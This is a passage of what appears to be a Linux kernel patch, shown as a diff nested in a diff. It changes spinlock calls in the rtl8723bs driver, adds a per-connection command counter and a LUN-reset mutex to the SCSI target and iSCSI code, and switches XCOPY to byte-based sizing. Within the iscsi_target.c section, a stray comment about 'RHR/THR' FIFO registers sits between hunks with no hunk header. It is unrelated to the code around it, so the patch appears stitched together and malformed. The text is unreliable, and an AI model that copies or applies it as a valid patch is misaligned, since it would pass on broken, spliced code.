++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	if (rtw_to_roam(adapter) > 0) { /* join timeout caused by roaming */
+ 		while (1) {
+@@ -1577,7 +1577,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
+ 
+ 	}
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ }
+ 
+ /*
+@@ -1590,11 +1590,11 @@ void rtw_scan_timeout_handler(struct timer_list *t)
+ 						  mlmepriv.scan_to_timer);
+ 	struct	mlme_priv *pmlmepriv = &adapter->mlmepriv;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	_clr_fwstate_(pmlmepriv, _FW_UNDER_SURVEY);
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ 
+ 	rtw_indicate_scan_done(adapter, true);
+ }
+diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c
+index baf4da7bb3b4e..3f7a9f7f5f4e3 100644
+--- a/drivers/target/iscsi/iscsi_target.c
++++ b/drivers/target/iscsi/iscsi_target.c
+@@ -1190,9 +1190,10 @@ int iscsit_setup_scsi_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	 * Initialize struct se_cmd descriptor from target_core_mod infrastructure
+ 	 */
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+-			 conn->sess->se_sess, be32_to_cpu(hdr->data_length),
+-			 cmd->data_direction, sam_task_attr,
+-			 cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun));
++			  conn->sess->se_sess, be32_to_cpu(hdr->data_length),
++			  cmd->data_direction, sam_task_attr,
++			  cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	pr_debug("Got SCSI Command, ITT: 0x%08x, CmdSN: 0x%08x,"
+ 		" ExpXferLen: %u, Length: %u, CID: %hu\n", hdr->itt,
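++/*
++ * The RHR/THR data register is a FIFO window; batched reads and writes
++ * must not auto-increment the register address.
++ */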
+@@ -2055,7 +2056,8 @@ iscsit_handle_task_mgt_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+ 			  conn->sess->se_sess, 0, DMA_NONE,
+ 			  TCM_SIMPLE_TAG, cmd->sense_buffer + 2,
+-			  scsilun_to_int(&hdr->lun));
++			  scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	target_get_sess_cmd(&cmd->se_cmd, true);
+ 
+@@ -4218,9 +4220,12 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 	list_for_each_entry_safe(cmd, cmd_tmp, &tmp_list, i_conn_node) {
+ 		struct se_cmd *se_cmd = &cmd->se_cmd;
+ 
+-		if (se_cmd->se_tfo != NULL) {
+-			spin_lock_irq(&se_cmd->t_state_lock);
+-			if (se_cmd->transport_state & CMD_T_ABORTED) {
++		if (!se_cmd->se_tfo)
++			continue;
++
++		spin_lock_irq(&se_cmd->t_state_lock);
++		if (se_cmd->transport_state & CMD_T_ABORTED) {
++			if (!(se_cmd->transport_state & CMD_T_TAS))
+ 				/*
+ 				 * LIO's abort path owns the cleanup for this,
+ 				 * so put it back on the list and let
+@@ -4228,11 +4233,10 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 				 */
+ 				list_move_tail(&cmd->i_conn_node,
+ 					       &conn->conn_cmd_list);
+-			} else {
+-				se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+-			}
+-			spin_unlock_irq(&se_cmd->t_state_lock);
++		} else {
++			se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+ 		}
++		spin_unlock_irq(&se_cmd->t_state_lock);
+ 	}
+ 	spin_unlock_bh(&conn->cmd_lock);
+ 
+@@ -4243,6 +4247,16 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 		iscsit_free_cmd(cmd, true);
+ 
+ 	}
++
++	/*
++	 * Wait on commands that were cleaned up via the aborted_task path.
++	 * LLDs that implement iscsit_wait_conn will already have waited for
++	 * commands.
++	 */
++	if (!conn->conn_transport->iscsit_wait_conn) {
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
++	}
+ }
+ 
+ static void iscsit_stop_timers_for_cmds(
+diff --git a/drivers/target/iscsi/iscsi_target_login.c b/drivers/target/iscsi/iscsi_target_login.c
+index 27e448c2d066c..274bdd7845ca9 100644
+--- a/drivers/target/iscsi/iscsi_target_login.c
++++ b/drivers/target/iscsi/iscsi_target_login.c
+@@ -1147,8 +1147,14 @@ static struct iscsit_conn *iscsit_alloc_conn(struct iscsi_np *np)
+ 		goto free_conn_cpumask;
+ 	}
+ 
++	conn->cmd_cnt = target_alloc_cmd_counter();
++	if (!conn->cmd_cnt)
++		goto free_conn_allowed_cpumask;
++
+ 	return conn;
+ 
++free_conn_allowed_cpumask:
++	free_cpumask_var(conn->allowed_cpumask);
+ free_conn_cpumask:
+ 	free_cpumask_var(conn->conn_cpumask);
+ free_conn_ops:
+@@ -1162,6 +1168,7 @@ free_conn:
+ 
+ void iscsit_free_conn(struct iscsit_conn *conn)
+ {
++	target_free_cmd_counter(conn->cmd_cnt);
+ 	free_cpumask_var(conn->allowed_cpumask);
+ 	free_cpumask_var(conn->conn_cpumask);
+ 	kfree(conn->conn_ops);
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index cb4f7cc02f8fa..d21f88de197c7 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -782,6 +782,7 @@ struct se_device *target_alloc_device(struct se_hba *hba, const char *name)
+ 	spin_lock_init(&dev->t10_alua.lba_map_lock);
+ 
+ 	INIT_WORK(&dev->delayed_cmd_work, target_do_delayed_work);
++	mutex_init(&dev->lun_reset_mutex);
+ 
+ 	dev->t10_wwn.t10_dev = dev;
+ 	/*
+diff --git a/drivers/target/target_core_internal.h b/drivers/target/target_core_internal.h
+index 38a6d08f75b34..85e35cf582e50 100644
+--- a/drivers/target/target_core_internal.h
++++ b/drivers/target/target_core_internal.h
+@@ -138,7 +138,6 @@ int	init_se_kmem_caches(void);
+ void	release_se_kmem_caches(void);
+ u32	scsi_get_new_index(scsi_index_t);
+ void	transport_subsystem_check_init(void);
+-void	transport_uninit_session(struct se_session *);
+ unsigned char *transport_dump_cmd_direction(struct se_cmd *);
+ void	transport_dump_dev_state(struct se_device *, char *, int *);
+ void	transport_dump_dev_info(struct se_device *, struct se_lun *,
+diff --git a/drivers/target/target_core_tmr.c b/drivers/target/target_core_tmr.c
+index 2b95b4550a637..4718db628222b 100644
+--- a/drivers/target/target_core_tmr.c
++++ b/drivers/target/target_core_tmr.c
+@@ -188,14 +188,23 @@ static void core_tmr_drain_tmr_list(
+ 	 * LUN_RESET tmr..
+ 	 */
+ 	spin_lock_irqsave(&dev->se_tmr_lock, flags);
+-	if (tmr)
+-		list_del_init(&tmr->tmr_list);
+ 	list_for_each_entry_safe(tmr_p, tmr_pp, &dev->dev_tmr_list, tmr_list) {
++		if (tmr_p == tmr)
++			continue;
++
+ 		cmd = tmr_p->task_cmd;
+ 		if (!cmd) {
+ 			pr_err("Unable to locate struct se_cmd for TMR\n");
+ 			continue;
+ 		}
++
++		/*
++		 * We only execute one LUN_RESET at a time, so we can't wait
++		 * on other LUN_RESET TMRs below.
++		 */
++		if (tmr_p->function == TMR_LUN_RESET)
++			continue;
++
+ 		/*
+ 		 * If this function was called with a valid pr_res_key
+ 		 * parameter (eg: for PROUT PREEMPT_AND_ABORT service action
+@@ -379,14 +388,25 @@ int core_tmr_lun_reset(
+ 				tmr_nacl->initiatorname);
+ 		}
+ 	}
++
++	/*
++	 * We only allow one reset or preempt and abort to execute at a time
++	 * to prevent one call from claiming all the cmds, causing a second
++	 * call to return while cmds it should have waited on are still
++	 * running.
++	 */
++	mutex_lock(&dev->lun_reset_mutex);
++
+ 	pr_debug("LUN_RESET: %s starting for [%s], tas: %d\n",
+ 		(preempt_and_abort_list) ? "Preempt" : "TMR",
+ 		dev->transport->name, tas);
+-
+ 	core_tmr_drain_tmr_list(dev, tmr, preempt_and_abort_list);
+ 	core_tmr_drain_state_list(dev, prout_cmd, tmr_sess, tas,
+ 				preempt_and_abort_list);
+ 
++	mutex_unlock(&dev->lun_reset_mutex);
++
+ 	/*
+ 	 * Clear any legacy SPC-2 reservation when called during
+ 	 * LOGICAL UNIT RESET
+diff --git a/drivers/target/target_core_tpg.c b/drivers/target/target_core_tpg.c
+index 736847c933e5c..8ebccdbd94f0e 100644
+--- a/drivers/target/target_core_tpg.c
++++ b/drivers/target/target_core_tpg.c
+@@ -328,7 +328,7 @@ static void target_shutdown_sessions(struct se_node_acl *acl)
+ restart:
+ 	spin_lock_irqsave(&acl->nacl_sess_lock, flags);
+ 	list_for_each_entry(sess, &acl->acl_sess_list, sess_acl_list) {
+-		if (atomic_read(&sess->stopped))
++		if (sess->cmd_cnt && atomic_read(&sess->cmd_cnt->stopped))
+ 			continue;
+ 
+ 		list_del_init(&sess->sess_acl_list);
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 5926316252eb9..86adff2a86edd 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -220,12 +220,52 @@ void transport_subsystem_check_init(void)
+ 	sub_api_initialized = 1;
+ }
+ 
+-static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
++static void target_release_cmd_refcnt(struct percpu_ref *ref)
+ {
+-	struct se_session *sess = container_of(ref, typeof(*sess), cmd_count);
++	struct target_cmd_counter *cmd_cnt  = container_of(ref,
++							   typeof(*cmd_cnt),
++							   refcnt);
++	wake_up(&cmd_cnt->refcnt_wq);
++}
++
++struct target_cmd_counter *target_alloc_cmd_counter(void)
++{
++	struct target_cmd_counter *cmd_cnt;
++	int rc;
++
++	cmd_cnt = kzalloc(sizeof(*cmd_cnt), GFP_KERNEL);
++	if (!cmd_cnt)
++		return NULL;
++
++	init_completion(&cmd_cnt->stop_done);
++	init_waitqueue_head(&cmd_cnt->refcnt_wq);
++	atomic_set(&cmd_cnt->stopped, 0);
+ 
+-	wake_up(&sess->cmd_count_wq);
++	rc = percpu_ref_init(&cmd_cnt->refcnt, target_release_cmd_refcnt, 0,
++			     GFP_KERNEL);
++	if (rc)
++		goto free_cmd_cnt;
++
++	return cmd_cnt;
++
++free_cmd_cnt:
++	kfree(cmd_cnt);
++	return NULL;
+ }
++EXPORT_SYMBOL_GPL(target_alloc_cmd_counter);
++
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt)
++{
++	/*
++	 * Drivers like loop do not call target_stop_session during session
++	 * shutdown so we have to drop the ref taken at init time here.
++	 */
++	if (!atomic_read(&cmd_cnt->stopped))
++		percpu_ref_put(&cmd_cnt->refcnt);
++
++	percpu_ref_exit(&cmd_cnt->refcnt);
++}
++EXPORT_SYMBOL_GPL(target_free_cmd_counter);
+ 
+ /**
+  * transport_init_session - initialize a session object
+@@ -233,32 +273,14 @@ static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
+  *
+  * The caller must have zero-initialized @se_sess before calling this function.
+  */
+-int transport_init_session(struct se_session *se_sess)
++void transport_init_session(struct se_session *se_sess)
+ {
+ 	INIT_LIST_HEAD(&se_sess->sess_list);
+ 	INIT_LIST_HEAD(&se_sess->sess_acl_list);
+ 	spin_lock_init(&se_sess->sess_cmd_lock);
+-	init_waitqueue_head(&se_sess->cmd_count_wq);
+-	init_completion(&se_sess->stop_done);
+-	atomic_set(&se_sess->stopped, 0);
+-	return percpu_ref_init(&se_sess->cmd_count,
+-			       target_release_sess_cmd_refcnt, 0, GFP_KERNEL);
+ }
+ EXPORT_SYMBOL(transport_init_session);
+ 
+-void transport_uninit_session(struct se_session *se_sess)
+-{
+-	/*
+-	 * Drivers like iscsi and loop do not call target_stop_session
+-	 * during session shutdown so we have to drop the ref taken at init
+-	 * time here.
+-	 */
+-	if (!atomic_read(&se_sess->stopped))
+-		percpu_ref_put(&se_sess->cmd_count);
+-
+-	percpu_ref_exit(&se_sess->cmd_count);
+-}
+-
+ /**
+  * transport_alloc_session - allocate a session object and initialize it
+  * @sup_prot_ops: bitmask that defines which T10-PI modes are supported.
+@@ -266,7 +288,6 @@ void transport_uninit_session(struct se_session *se_sess)
+ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ {
+ 	struct se_session *se_sess;
+-	int ret;
+ 
+ 	se_sess = kmem_cache_zalloc(se_sess_cache, GFP_KERNEL);
+ 	if (!se_sess) {
+@@ -274,11 +295,7 @@ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ 				" se_sess_cache\n");
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+-	ret = transport_init_session(se_sess);
+-	if (ret < 0) {
+-		kmem_cache_free(se_sess_cache, se_sess);
+-		return ERR_PTR(ret);
+-	}
++	transport_init_session(se_sess);
+ 	se_sess->sup_prot_ops = sup_prot_ops;
+ 
+ 	return se_sess;
+@@ -444,8 +461,13 @@ target_setup_session(struct se_portal_group *tpg,
+ 		     int (*callback)(struct se_portal_group *,
+ 				     struct se_session *, void *))
+ {
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_session *sess;
++	int rc;
+ 
++	cmd_cnt = target_alloc_cmd_counter();
++	if (!cmd_cnt)
++		return ERR_PTR(-ENOMEM);
+ 	/*
+ 	 * If the fabric driver is using percpu-ida based pre allocation
+ 	 * of I/O descriptor tags, go ahead and perform that setup now..
+@@ -455,29 +477,36 @@ target_setup_session(struct se_portal_group *tpg,
+ 	else
+ 		sess = transport_alloc_session(prot_op);
+ 
+-	if (IS_ERR(sess))
+-		return sess;
++	if (IS_ERR(sess)) {
++		rc = PTR_ERR(sess);
++		goto free_cnt;
++	}
++	sess->cmd_cnt = cmd_cnt;
+ 
+ 	sess->se_node_acl = core_tpg_check_initiator_node_acl(tpg,
+ 					(unsigned char *)initiatorname);
+ 	if (!sess->se_node_acl) {
+-		transport_free_session(sess);
+-		return ERR_PTR(-EACCES);
++		rc = -EACCES;
++		goto free_sess;
+ 	}
+ 	/*
+ 	 * Go ahead and perform any remaining fabric setup that is
+ 	 * required before transport_register_session().
+ 	 */
+ 	if (callback != NULL) {
+-		int rc = callback(tpg, sess, private);
+-		if (rc) {
+-			transport_free_session(sess);
+-			return ERR_PTR(rc);
+-		}
++		rc = callback(tpg, sess, private);
++		if (rc)
++			goto free_sess;
+ 	}
+ 
+ 	transport_register_session(tpg, sess->se_node_acl, sess, private);
+ 	return sess;
++
++free_sess:
++	transport_free_session(sess);
++free_cnt:
++	target_free_cmd_counter(cmd_cnt);
++	return ERR_PTR(rc);
+ }
+ EXPORT_SYMBOL(target_setup_session);
+ 
+@@ -602,7 +631,8 @@ void transport_free_session(struct se_session *se_sess)
+ 		sbitmap_queue_free(&se_sess->sess_tag_pool);
+ 		kvfree(se_sess->sess_cmd_map);
+ 	}
+-	transport_uninit_session(se_sess);
++	if (se_sess->cmd_cnt)
++		target_free_cmd_counter(se_sess->cmd_cnt);
+ 	kmem_cache_free(se_sess_cache, se_sess);
+ }
+ EXPORT_SYMBOL(transport_free_session);
+@@ -1412,14 +1442,12 @@ target_cmd_size_check(struct se_cmd *cmd, unsigned int size)
+  *
+  * Preserves the value of @cmd->tag.
+  */
+-void __target_init_cmd(
+-	struct se_cmd *cmd,
+-	const struct target_core_fabric_ops *tfo,
+-	struct se_session *se_sess,
+-	u32 data_length,
+-	int data_direction,
+-	int task_attr,
+-	unsigned char *sense_buffer, u64 unpacked_lun)
++void __target_init_cmd(struct se_cmd *cmd,
++		       const struct target_core_fabric_ops *tfo,
++		       struct se_session *se_sess, u32 data_length,
++		       int data_direction, int task_attr,
++		       unsigned char *sense_buffer, u64 unpacked_lun,
++		       struct target_cmd_counter *cmd_cnt)
+ {
+ 	INIT_LIST_HEAD(&cmd->se_delayed_node);
+ 	INIT_LIST_HEAD(&cmd->se_qf_node);
+@@ -1439,6 +1467,7 @@ void __target_init_cmd(
+ 	cmd->sam_task_attr = task_attr;
+ 	cmd->sense_buffer = sense_buffer;
+ 	cmd->orig_fe_lun = unpacked_lun;
++	cmd->cmd_cnt = cmd_cnt;
+ 
+ 	if (!(cmd->se_cmd_flags & SCF_USE_CPUID))
+ 		cmd->cpuid = raw_smp_processor_id();
+@@ -1658,7 +1687,8 @@ int target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	 * target_core_fabric_ops->queue_status() callback
+ 	 */
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess, data_length,
+-			  data_dir, task_attr, sense, unpacked_lun);
++			  data_dir, task_attr, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 
+ 	/*
+ 	 * Obtain struct se_cmd->cmd_kref reference. A second kref_get here is
+@@ -1953,7 +1983,8 @@ int target_submit_tmr(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	BUG_ON(!se_tpg);
+ 
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess,
+-			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun);
++			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 	/*
+ 	 * FIXME: Currently expect caller to handle se_cmd->se_tmr_req
+ 	 * allocation failure.
+@@ -2957,7 +2988,6 @@ EXPORT_SYMBOL(transport_generic_free_cmd);
+  */
+ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ {
+-	struct se_session *se_sess = se_cmd->se_sess;
+ 	int ret = 0;
+ 
+ 	/*
+@@ -2970,9 +3000,14 @@ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ 		se_cmd->se_cmd_flags |= SCF_ACK_KREF;
+ 	}
+ 
+-	if (!percpu_ref_tryget_live(&se_sess->cmd_count))
+-		ret = -ESHUTDOWN;
+-
++	/*
++	 * Users like xcopy do not use counters since they never do a stop
++	 * and wait.
++	 */
++	if (se_cmd->cmd_cnt) {
++		if (!percpu_ref_tryget_live(&se_cmd->cmd_cnt->refcnt))
++			ret = -ESHUTDOWN;
++	}
+ 	if (ret && ack_kref)
+ 		target_put_sess_cmd(se_cmd);
+ 
+@@ -2993,7 +3028,7 @@ static void target_free_cmd_mem(struct se_cmd *cmd)
+ static void target_release_cmd_kref(struct kref *kref)
+ {
+ 	struct se_cmd *se_cmd = container_of(kref, struct se_cmd, cmd_kref);
+-	struct se_session *se_sess = se_cmd->se_sess;
++	struct target_cmd_counter *cmd_cnt = se_cmd->cmd_cnt;
+ 	struct completion *free_compl = se_cmd->free_compl;
+ 	struct completion *abrt_compl = se_cmd->abrt_compl;
+ 
+@@ -3004,7 +3039,8 @@ static void target_release_cmd_kref(struct kref *kref)
+ 	if (abrt_compl)
+ 		complete(abrt_compl);
+ 
+-	percpu_ref_put(&se_sess->cmd_count);
++	if (cmd_cnt)
++		percpu_ref_put(&cmd_cnt->refcnt);
+ }
+ 
+ /**
+@@ -3123,46 +3159,67 @@ void target_show_cmd(const char *pfx, struct se_cmd *cmd)
+ }
+ EXPORT_SYMBOL(target_show_cmd);
+ 
+-static void target_stop_session_confirm(struct percpu_ref *ref)
++static void target_stop_cmd_counter_confirm(struct percpu_ref *ref)
++{
++	struct target_cmd_counter *cmd_cnt = container_of(ref,
++						struct target_cmd_counter,
++						refcnt);
++	complete_all(&cmd_cnt->stop_done);
++}
++
++/**
++ * target_stop_cmd_counter - Stop new IO from being added to the counter.
++ * @cmd_cnt: counter to stop
++ */
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt)
+ {
+-	struct se_session *se_sess = container_of(ref, struct se_session,
+-						  cmd_count);
+-	complete_all(&se_sess->stop_done);
++	pr_debug("Stopping command counter.\n");
++	if (!atomic_cmpxchg(&cmd_cnt->stopped, 0, 1))
++		percpu_ref_kill_and_confirm(&cmd_cnt->refcnt,
++					    target_stop_cmd_counter_confirm);
+ }
++EXPORT_SYMBOL_GPL(target_stop_cmd_counter);
+ 
+ /**
+  * target_stop_session - Stop new IO from being queued on the session.
+- * @se_sess:    session to stop
++ * @se_sess: session to stop
+  */
+ void target_stop_session(struct se_session *se_sess)
+ {
+-	pr_debug("Stopping session queue.\n");
+-	if (atomic_cmpxchg(&se_sess->stopped, 0, 1) == 0)
+-		percpu_ref_kill_and_confirm(&se_sess->cmd_count,
+-					    target_stop_session_confirm);
++	target_stop_cmd_counter(se_sess->cmd_cnt);
+ }
+ EXPORT_SYMBOL(target_stop_session);
+ 
+ /**
+- * target_wait_for_sess_cmds - Wait for outstanding commands
+- * @se_sess:    session to wait for active I/O
++ * target_wait_for_cmds - Wait for outstanding cmds.
++ * @cmd_cnt: counter whose active I/O to wait for.
+  */
+-void target_wait_for_sess_cmds(struct se_session *se_sess)
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt)
+ {
+ 	int ret;
+ 
+-	WARN_ON_ONCE(!atomic_read(&se_sess->stopped));
++	WARN_ON_ONCE(!atomic_read(&cmd_cnt->stopped));
+ 
+ 	do {
+ 		pr_debug("Waiting for running cmds to complete.\n");
+-		ret = wait_event_timeout(se_sess->cmd_count_wq,
+-				percpu_ref_is_zero(&se_sess->cmd_count),
+-				180 * HZ);
++		ret = wait_event_timeout(cmd_cnt->refcnt_wq,
++					 percpu_ref_is_zero(&cmd_cnt->refcnt),
++					 180 * HZ);
+ 	} while (ret <= 0);
+ 
+-	wait_for_completion(&se_sess->stop_done);
++	wait_for_completion(&cmd_cnt->stop_done);
+ 	pr_debug("Waiting for cmds done.\n");
+ }
++EXPORT_SYMBOL_GPL(target_wait_for_cmds);
++
++/**
++ * target_wait_for_sess_cmds - Wait for outstanding commands
++ * @se_sess: session to wait for active I/O
++ */
++void target_wait_for_sess_cmds(struct se_session *se_sess)
++{
++	target_wait_for_cmds(se_sess->cmd_cnt);
++}
+ EXPORT_SYMBOL(target_wait_for_sess_cmds);
+ 
+ /*
+diff --git a/drivers/target/target_core_xcopy.c b/drivers/target/target_core_xcopy.c
+index 8713cda0c2fb5..d2900d3751516 100644
+--- a/drivers/target/target_core_xcopy.c
++++ b/drivers/target/target_core_xcopy.c
+@@ -461,8 +461,6 @@ static const struct target_core_fabric_ops xcopy_pt_tfo = {
+ 
+ int target_xcopy_setup_pt(void)
+ {
+-	int ret;
+-
+ 	xcopy_wq = alloc_workqueue("xcopy_wq", WQ_MEM_RECLAIM, 0);
+ 	if (!xcopy_wq) {
+ 		pr_err("Unable to allocate xcopy_wq\n");
+@@ -479,9 +477,7 @@ int target_xcopy_setup_pt(void)
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_list);
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_sess_list);
+ 	memset(&xcopy_pt_sess, 0, sizeof(struct se_session));
+-	ret = transport_init_session(&xcopy_pt_sess);
+-	if (ret < 0)
+-		goto destroy_wq;
++	transport_init_session(&xcopy_pt_sess);
+ 
+ 	xcopy_pt_nacl.se_tpg = &xcopy_pt_tpg;
+ 	xcopy_pt_nacl.nacl_sess = &xcopy_pt_sess;
+@@ -490,19 +486,12 @@ int target_xcopy_setup_pt(void)
+ 	xcopy_pt_sess.se_node_acl = &xcopy_pt_nacl;
+ 
+ 	return 0;
+-
+-destroy_wq:
+-	destroy_workqueue(xcopy_wq);
+-	xcopy_wq = NULL;
+-	return ret;
+ }
+ 
+ void target_xcopy_release_pt(void)
+ {
+-	if (xcopy_wq) {
++	if (xcopy_wq)
+ 		destroy_workqueue(xcopy_wq);
+-		transport_uninit_session(&xcopy_pt_sess);
+-	}
+ }
+ 
+ /*
+@@ -582,11 +571,11 @@ static int target_xcopy_read_source(
+ 	struct xcopy_op *xop,
+ 	struct se_device *src_dev,
+ 	sector_t src_lba,
+-	u32 src_sectors)
++	u32 src_bytes)
+ {
+ 	struct xcopy_pt_cmd xpt_cmd;
+ 	struct se_cmd *se_cmd = &xpt_cmd.se_cmd;
+-	u32 length = (src_sectors * src_dev->dev_attrib.block_size);
++	u32 transfer_length_block = src_bytes / src_dev->dev_attrib.block_size;
+ 	int rc;
+ 	unsigned char cdb[16];
+ 	bool remote_port = (xop->op_origin == XCOL_DEST_RECV_OP);
+@@ -597,13 +586,13 @@ static int target_xcopy_read_source(
+ 	memset(&cdb[0], 0, 16);
+ 	cdb[0] = READ_16;
+ 	put_unaligned_be64(src_lba, &cdb[2]);
+-	put_unaligned_be32(src_sectors, &cdb[10]);
+-	pr_debug("XCOPY: Built READ_16: LBA: %llu Sectors: %u Length: %u\n",
+-		(unsigned long long)src_lba, src_sectors, length);
+-
+-	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, length,
+-			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
++	put_unaligned_be32(transfer_length_block, &cdb[10]);
++	pr_debug("XCOPY: Built READ_16: LBA: %llu Blocks: %u Length: %u\n",
++		(unsigned long long)src_lba, transfer_length_block, src_bytes);
+ 
++	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, src_bytes,
++			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, src_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+@@ -627,11 +616,11 @@ static int target_xcopy_write_destination(
+ 	struct xcopy_op *xop,
+ 	struct se_device *dst_dev,
+ 	sector_t dst_lba,
+-	u32 dst_sectors)
++	u32 dst_bytes)
+ {
+ 	struct xcopy_pt_cmd xpt_cmd;
+ 	struct se_cmd *se_cmd = &xpt_cmd.se_cmd;
+-	u32 length = (dst_sectors * dst_dev->dev_attrib.block_size);
++	u32 transfer_length_block = dst_bytes / dst_dev->dev_attrib.block_size;
+ 	int rc;
+ 	unsigned char cdb[16];
+ 	bool remote_port = (xop->op_origin == XCOL_SOURCE_RECV_OP);
+@@ -642,13 +631,13 @@ static int target_xcopy_write_destination(
+ 	memset(&cdb[0], 0, 16);
+ 	cdb[0] = WRITE_16;
+ 	put_unaligned_be64(dst_lba, &cdb[2]);
+-	put_unaligned_be32(dst_sectors, &cdb[10]);
+-	pr_debug("XCOPY: Built WRITE_16: LBA: %llu Sectors: %u Length: %u\n",
+-		(unsigned long long)dst_lba, dst_sectors, length);
+-
+-	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, length,
+-			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
++	put_unaligned_be32(transfer_length_block, &cdb[10]);
++	pr_debug("XCOPY: Built WRITE_16: LBA: %llu Blocks: %u Length: %u\n",
++		(unsigned long long)dst_lba, transfer_length_block, dst_bytes);
+ 
++	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, dst_bytes,
++			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, dst_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+@@ -670,9 +659,10 @@ static void target_xcopy_do_work(struct work_struct *work)
+ 	struct se_cmd *ec_cmd = xop->xop_se_cmd;
+ 	struct se_device *src_dev, *dst_dev;
+ 	sector_t src_lba, dst_lba, end_lba;
+-	unsigned int max_sectors;
++	unsigned long long max_bytes, max_bytes_src, max_bytes_dst, max_blocks;
+ 	int rc = 0;
+-	unsigned short nolb, max_nolb, copied_nolb = 0;
++	unsigned short nolb;
++	unsigned int copied_bytes = 0;
+ 	sense_reason_t sense_rc;
+ 
+ 	sense_rc = target_parse_xcopy_cmd(xop);
+@@ -691,23 +681,31 @@ static void target_xcopy_do_work(struct work_struct *work)
+ 	nolb = xop->nolb;
+ 	end_lba = src_lba + nolb;
+ 	/*
+-	 * Break up XCOPY I/O into hw_max_sectors sized I/O based on the
+-	 * smallest max_sectors between src_dev + dev_dev, or
++	 * Break up XCOPY I/O into hw_max_sectors * hw_block_size sized
++	 * I/O based on the smallest max_bytes between src_dev + dst_dev
+ 	 */
+-	max_sectors = min(src_dev->dev_attrib.hw_max_sectors,
+-			  dst_dev->dev_attrib.hw_max_sectors);
+-	max_sectors = min_t(u32, max_sectors, XCOPY_MAX_SECTORS);
++	max_bytes_src = (unsigned long long) src_dev->dev_attrib.hw_max_sectors *
++			src_dev->dev_attrib.hw_block_size;
++	max_bytes_dst = (unsigned long long) dst_dev->dev_attrib.hw_max_sectors *
++			dst_dev->dev_attrib.hw_block_size;
++
++	max_bytes = min_t(u64, max_bytes_src, max_bytes_dst);
++	max_bytes = min_t(u64, max_bytes, XCOPY_MAX_BYTES);
+ 
+-	max_nolb = min_t(u16, max_sectors, ((u16)(~0U)));
++	/*
++	 * Use a shift instead of division because otherwise GCC
++	 * generates a __udivdi3 call, which is missing on i386.
++	 */
++	max_blocks = max_bytes >> ilog2(src_dev->dev_attrib.block_size);
+ 
+-	pr_debug("target_xcopy_do_work: nolb: %hu, max_nolb: %hu end_lba: %llu\n",
+-			nolb, max_nolb, (unsigned long long)end_lba);
+-	pr_debug("target_xcopy_do_work: Starting src_lba: %llu, dst_lba: %llu\n",
++	pr_debug("%s: nolb: %u, max_blocks: %llu end_lba: %llu\n", __func__,
++			nolb, max_blocks, (unsigned long long)end_lba);
++	pr_debug("%s: Starting src_lba: %llu, dst_lba: %llu\n", __func__,
+ 			(unsigned long long)src_lba, (unsigned long long)dst_lba);
+ 
